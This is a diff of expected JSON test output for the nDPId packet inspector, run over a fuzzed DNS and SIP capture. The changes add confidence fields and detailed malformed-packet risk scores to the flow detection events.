 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1120470495627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470495627,"pkt":"\/\/\/\/\/\/\/\/AODtNm69CABFAABOe24AAIARSt+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1120470496048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470496048,"pkt":"ADBUADRWAODtAVW9CABFAABIa28AAIARS+LAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAghAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1120470501450,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470501450,"pkt":"ADBUADRWAODtAW69CABFAABIa3QAAIARS93AqAECwKhDAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaSVzAHliZXJjaaqqqqqqqqqqqqo="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1120470509447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470509447,"pkt":"ADBUADRWAODtAW69CABFAABEeHUAAIARS+DAqAECwKgBAQroADUAMOPqQOwAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1120470509449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470509449,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEB8KgBAgA1CugAR8ZmQOyAAABkAAEAAAAAATEBMAEwAzEyNwdpbi1hGmRyBGFycGEAAFcAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01004{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"ts_msec":1120470509599,"pkt":"AODtAW69ADBUADRWCABFAEMGAABAADcRiifU8iEjwKgBAhPEE8QB8vKXU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zNzBkOGU1DQpUbzogPHNpcDozNTEwNDcyM2pzaXAuY3liZSljaXR5LmRrPjt0YWc9MDAtMDQwODMtMTcwMWI2ZGQtMDUxZjVkYzMxDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNo4uMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTUuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wNTc3MjYxOTctNDg0MWM3Y2QxOTIuMTY4LjEuMvQKV1dXLUF1dGhlbnRpY2F0ZTogRGlnZXN0IHJlYWxtPSJzaXAuY3lzZXJjaXR5LmRrIixub25jZT0iMTcwMWI2Y2MxY2JjOTBkMzI4ZmUxZjFhMzFhMmM0ZSIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLHN0YWxlPWZhbHNlLGFsZ29yaXRobT1NRDUNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -990,25 +992,25 @@
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470541475,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
